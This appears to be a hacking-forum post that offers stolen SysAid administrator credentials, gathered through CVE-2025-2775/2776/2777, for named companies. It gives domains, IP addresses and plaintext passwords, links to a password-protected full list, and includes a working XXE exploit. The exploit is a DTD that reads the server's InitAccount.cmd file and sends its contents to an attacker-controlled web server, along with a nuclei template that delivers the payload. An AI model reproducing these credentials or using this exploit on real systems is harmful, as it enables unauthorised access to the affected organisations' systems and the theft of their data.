SysAid Admin Creds Leak - Gov, Telecom, Corps - Fresh May 2025

[sart0ri]

Цена

0

Контакты

@sart0rix

XSS, got some SysAid admin creds from recent CVEs (2025-2775/2776/2777). Tested May 8, 2025. Sharing three to start, w
ith PoCs showing login and one exploitation. More targets in the list.

Samples:
infoset.it = 52.144.80.147 | sysaid_admin : asKgjIV1vqVz9pjO
PoC: paste[.]pics/4ce4d95de3a10b032ece13035d642288

grupolpj.com = 13.38.58.170 | Admin: Lpj123456
PoC: paste[.]pics/42761c64d9d3518c7e400545f8379846

esrinosa.com = 200.3.246.19 | sysaidadmin : Esri2019*
PoC: paste[.]pics/8677089ffb466becb6fc46e0488a52d1


Full list: pastebin[.]com/BT7ck8u3
Pass: 8xJ9Zj1LmH

Note: Some creds might not work if targets are changed password. message me if issues; I'll verify and fix where possible.

if you trying to reproduce the exploit here is my custom template for returning the sensitive
step1: create a dtd file:

<!ENTITY % d SYSTEM "file:///C:\\Program Files\\SysAidServer\\logs\\InitAccount.cmd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'http://PYTHON-SERVER/?e=%d;'>">

step2: start a apache server and a second web server like python server and run the template

id: xxe-static-payload-cdl
info:
  name: Static XXE Payload Injection (CDL)
  author: yourname
  severity: high
  description: Sends a static XXE payload to test for XML External Entity vulnerabilities.
  tags: xxe, injection, xml

http:
  - method: POST
    path:
      - "{{BaseURL}}/mdm/serverurl"
    headers:
      Content-Type: application/xml
    body: |
      <?xml version="1.0"?>
      <!DOCTYPE cdl [<!ENTITY % asd SYSTEM "http://APACHE-SERVER/cus.dtd">%asd;%c;]>
      <cdl>&rrr;</cdl>